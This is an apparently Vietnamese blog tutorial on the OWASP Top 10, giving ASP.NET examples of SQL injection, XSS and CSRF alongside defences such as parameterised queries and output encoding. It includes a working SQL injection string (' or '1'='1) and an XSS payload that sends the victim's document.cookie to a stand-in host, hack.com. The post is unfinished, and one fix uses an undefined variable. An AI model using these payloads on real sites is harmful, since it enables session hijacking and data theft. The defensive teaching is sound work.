10 nguy cơ bảo mật ứng dụng web hàng đầu OWASP và cách phòng chống


Tìm hiểu chi tiết 10 rủi ro bảo mật hàng đầu về định nghĩa, về cách khai thác lỗ hổng và về cách xây dựng hệ thống phòng chống


Giới thiệu OWASP và Top 10

 • OWASP is the Open Web Application Security Project
 • Họ là một tổ chức phi lợi nhuận trên toàn thế giới tập trung vào việc nâng cao tính bảo mật của phần mềm trên web
 • Họ tạo ra một tài liệu được gọi là Top 10 nguy cơ bảo mật ứng dụng Web quan trọng nhất
 • "Top 10" là một hướng dẫn công nghệ để quản lý rủi ro bảo mật trang web phổ biến
 • Nó thường là một nơi để tham khảo cho các chuyên gia bảo mật và các nhà phát triển cùng nhau

Ai đang bị tấn công ?

90% trang web có các lỗi bảo mật nghiêm trọng.

who getting hacked

Hacktivists là ai ?

 • Họ thường là trẻ, thiếu kinh nghiệm và không ý thức về hậu quả xã hội của hành động của họ
 • Họ được tài trợ rất ít nhưng cuộc tấn công thành công thì được rất nhiều. Thường là cạnh tranh không lành mạnh giữa các doanh nghiệp
 • Chúng ta biết họ bằng các tên như Anonymous và LulzSec

Top 10

 1. Injection
 2. Cross-Site Scripting (XSS)
 3. Broken Authentication and Session Management
 4. Insecure Direct Object References
 5. Cross-Site Request Forgery (CSRF)
 6. Security Misconfiguration
 7. Insecure Cryptographic Storage
 8. Failure to Restrict URL Access
 9. Insufficient Transport Layer Protection
 10. Unvalidated Redirects and Forwards

hiểu các nguy cơ lỗ hổng bảo mật dành cho ứng dụng web

Tìm hiểu về Injection

Lỗi Injection rất phổ biến, đặc biệt là trong các mã nguồn mở. Injection thường được tìm thấy trong các truy vấn SQL, LDAP, Xpath hoặc truy vấn NoSQL, XML parsers, SMTP Headers... 

Các lỗ hổng trong Injection dễ dàng khám phá và phần mềm tự động quét có thể giúp những kẻ xấu tìm thấy các lỗ hổng.

Kịch bản tấn công Injection như thế nào

Kịch bản 1: Ứng dụng sử dụng câu truy vấn SQL xem thông tin tài khoản theo mã tài khoản:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

Kịch bản 2: Ngôn ngữ truy vấn Hibernate (HQL)

Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");

Trong cả hai trường hợp trên, kẻ tấn công sửa đổi giá trị tham số 'id' trong trình duyệt của mình để gửi: 'or' 1 '=' 1

https://mastercode.vn/app/accountView?id=' or '1'='1

Điều này thay đổi ý nghĩa của cả hai truy vấn để trả lại tất cả các bản ghi từ bảng tài khoản. Các cuộc tấn công nguy hiểm hơn có thể sửa đổi dữ liệu hoặc thậm chí gọi thủ tục lưu sẵn

Đoạn code bên dưới trước khi được nâng cấp bảo vệ

protected void Page_Load(object sender, EventArgs e)
{
  var productSubCategoryId = Request.QueryString["ProductSubCategoryId"];

  var connString = WebConfigurationManager.ConnectionStrings["DefaultConnection"].ConnectionString;
  var sqlString = "SELECT * FROM Product WHERE ProductSubCategoryID = " + productSubCategoryId;
  using (var conn = new SqlConnection(connString))
  {
    using (var command = new SqlCommand(sqlString, conn))
    {
      command.Connection.Open();
      ProductGridView.DataSource = command.ExecuteReader();
      ProductGridView.DataBind();
    }
  }

  ProductCount.Text = ProductGridView.Rows.Count.ToString("n0");
}

Các phòng chống Injection

 • Sử dụng Inline SQL Parameterisation
protected void Page_Load(object sender, EventArgs e)
{
  var productSubCategoryId = Request.QueryString["ProductSubCategoryId"];

  var connString = WebConfigurationManager.ConnectionStrings["DefaultConnection"].ConnectionString;
  var sqlString = "SELECT * FROM Product WHERE ProductSubCategoryID = @ProductSubCategoryId";
  using (var conn = new SqlConnection(connString))
  {
  using (var command = new SqlCommand(sqlString, conn))
  {
    command.Parameters.Add("@ProductSubCategoryID", SqlDbType.VarChar).Value = productSubCategoryId;
    command.Connection.Open();
    ProductGridView.DataSource = command.ExecuteReader();
    ProductGridView.DataBind();
  }
  }

  ProductCount.Text = ProductGridView.Rows.Count.ToString("n0");
}
 • Sử dụng Stored Procedure Parameterisation
protected void Page_Load(object sender, EventArgs e)
{
  var productSubCategoryId = Request.QueryString["ProductSubCategoryId"];

  var connString = WebConfigurationManager.ConnectionStrings["DefaultConnection"].ConnectionString;
  using (var conn = new SqlConnection(connString))
  {
    using (var command = new SqlCommand("GetProducts", conn))
    {
      command.CommandType = CommandType.StoredProcedure;
      command.Parameters.Add("@ProductSubCategoryID", SqlDbType.VarChar).Value = productSubCategoryId;
      command.Connection.Open();
      ProductGridView.DataSource = command.ExecuteReader();
      ProductGridView.DataBind();
    }
  }

  ProductCount.Text = ProductGridView.Rows.Count.ToString("n0");
}
 • Sử dụng Entity Framework’s SQL parameterisation
protected void Page_Load(object sender, EventArgs e)
{
  var productSubCategoryId = Request.QueryString["ProductSubCategoryId"];

  int id;
  if (!int.TryParse(productSubCategoryId, out id))
  {
    throw new ApplicationException("ID wasn't an integer");
  }

  var dc = new InjectionEntities();

  ProductGridView.DataSource = dc.Products.Where(p => p.ProductSubcategoryID == id).ToList();
  ProductGridView.DataBind();

  ProductCount.Text = ProductGridView.Rows.Count.ToString("n0");
}
 • Kiểm tra tính hợp lệ của biến
protected void Page_Load(object sender, EventArgs e)
{
  var productSubCategoryId = Request.QueryString["ProductSubCategoryId"];
  //Kiểm tra tính hợp lệ của biến
  int id;
  if (!int.TryParse(productSubCategoryId, out id))
  {
    throw new ApplicationException("ID wasn't an integer");
  }

  var connString = WebConfigurationManager.ConnectionStrings["DefaultConnection"].ConnectionString;
  using (var conn = new SqlConnection(connString))
  {
    using (var command = new SqlCommand("GetProducts", conn))
    {
      command.CommandType = CommandType.StoredProcedure;
      command.Parameters.Add("@ProductSubCategoryID", SqlDbType.Int).Value = id;
      command.Connection.Open();
      ProductGridView.DataSource = command.ExecuteReader();
      ProductGridView.DataBind();
    }
  }

  ProductCount.Text = ProductGridView.Rows.Count.ToString("n0");
}

Phần mềm tự động tấn công website thông qua lỗi Injection để ăn cấp dữ liệu thông tin thẻ của người dùng

havij injection top 10

Tìm hiểu về Cross-Site Scripting (XSS)

XSS (Cross Site Scripting) là một kiểu tấn công cho phép hacker chèn những đoạn script độc hại (thông thường là Javascript hoặc HTML) vào website và sẽ được thực thi ở phía người dùng (trong trình duyệt của người dùng).

Đối với XSS, người bị tấn công là người dùng chứ không phải website, hacker có thể dùng XSS để gửi những đoạn script độc hại tới một người dùng bất kỳ, và trình duyệt của người dùng sẽ thực thi những đoạn script đó và gửi về cho hacker những thông tin của người dùng thông qua email hoặc server do hacker định sẵn từ trước.

Các dạng tấn công XSS

 • Persistent XSS (hay còn gọi là Stored XSS)
 • Non-Persistent XSS (hay còn gọi là Reflected XSS)
 • DOM-based XSS

Kịch bản tấn công Cross-Site Scripting (XSS) như thế nào

Cross-Site Scripting

Cross-Site Scripting

https://www.mastercode.vn/khoa-hoc?keysearch=mvc

Trang web trên rất bình thường nhưng nếu hacker truyền thành một đường link thay đổi như sau

https://www.mastercode.vn/khoa-hoc?keysearch=mvc<script>document.location= 'http://hack.com/save?cookie=' + document.cookie</script>

Kẻ tấn công ngoài truyền dữ liệu với nội dung là MVC ngoài ra còn chèn thêm đoạn mã độc lấy thông tin cookie của người dùng. Nếu website bạn bị lỗi XSS thì kẻ tấn công chỉ việc gửi link trên cho nạn nhận. Khi nạn nhân mở đường link đó sẽ bị lấy cắp thông tin. (Thông thường được link trước khi gửi được rút gọn link hoặc được che dấu dưới nội dung)

protected void Page_Load(object sender, EventArgs e)
{
  var search = Request.QueryString["keysearch"];
  SearchTerm.Text = search;
}

Cách phòng chống Cross-Site Scripting (XSS)

 • Không bao giờ thêm dữ liệu vào CSDL mà không kiểm tra tính hợp lệ và sử dụng bộ lọc
 • Ghi log lại những dữ liệu không hợp lệ. (Ví dụ lưu lại thông tin IP)

antiXSS library for NET

 • Sử dụng thư viện Security Encode của Microsoft: https://www.nuget.org/packages/AntiXSS
  • Javascript: Microsoft.Security.Application.Encoder.JavaScriptEncode(Request.QueryString["keysearch"])
<script type="text/javascript">
	var q = <%= Microsoft.Security.Application.Encoder.JavaScriptEncode(Request.QueryString["keysearch"]) %>
</script>
  • HTML: AntiXssEncoder.HtmlEncode(searchTerm, true)
using System.Web.Security.AntiXss;
protected void Page_Load(object sender, EventArgs e)
{
  var search = Request.QueryString["keysearch"];
  SearchTerm.Text = AntiXssEncoder.HtmlEncode(searchTerm, true);
}
  • CSS:
 • Không cho phép các ký tự đặc biệt
using System.Web.Security.AntiXss;
using System.Text.RegularExpressions;
protected void Page_Load(object sender, EventArgs e)
{
  var search = Request.QueryString["keysearch"];
  if (!Regex.IsMatch(search, @"^[\p{L} \.\-]+$"))
  {
    throw new ApplicationException("Search term is not allowed");
  }
  SearchTerm.Text = AntiXssEncoder.HtmlEncode(searchTerm, true);
}
 • Kích hoạt X-XSS-Protection ở trình duyệt chống tấn công Cross Site Scripting
  • X-XSS-Protection: 0 : tắt chế độ này
  • X-XSS-Protection: 1 : lọc bỏ các đoạn scrip ở trong request, nhưng vẫn hiển thị trang web
  • X-XSS-Protection: 1; mode=block : khi được kích hoạt sẽ vô hiệu hoàn toàn việc hiển thị trang web
<system.webServer>
 <httpProtocol>
  <customHeaders>
   <add name="X-XSS-Protection" value="1; mode=block" />
  </customHeaders>
 </httpProtocol>
</system.webServer>
 • https://msdn.microsoft.com/en-us/library/ff649310.aspx
 • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
 • https://samy.pl/popular/tech.html

Tìm hiểu kỹ thuật tấn công CSRF và Cách phòng chống

CSRF ( Cross Site Request Forgery) là kỹ thuật tấn công bằng cách sử dụng quyền chứng thực của người dùng đối với một website. CSRF là kỹ thuật tấn công vào người dùng, dựa vào đó hacker có thể thực thi những thao tác phải yêu cầu sự chứng thực. Hiểu một cách nôm na, đây là kỹ thuật tấn công dựa vào mượn quyền trái phép. CSRF còn được gọi là "session riding", "XSRF"

Kỹ thuật tấn công CSRF hay còn gọi là kỹ thuật tấn công "Cross-site Request Forgery", nghĩa là kỹ thuật tấn công giả mạo chính chủ thể của nó. Một ví dụ thế này cho các bạn dễ hình dung.

Giả sử trong hệ thống các bạn có một action xử lý xóa người dùng với url như sau: mastercode.vn/deleteuser?id=12 (Xóa user có id = 12). Như vậy giả sử một người nào đó biết được URL này thì họ sẽ hack được, và họ sẽ lợi dụng chính admin của hệ thống.

Tham khảo thêm tài liệu

Bài viết còn cập nhật nhiều..... Tại không có thời gian nhiều :D

Chia sẽ bài viết :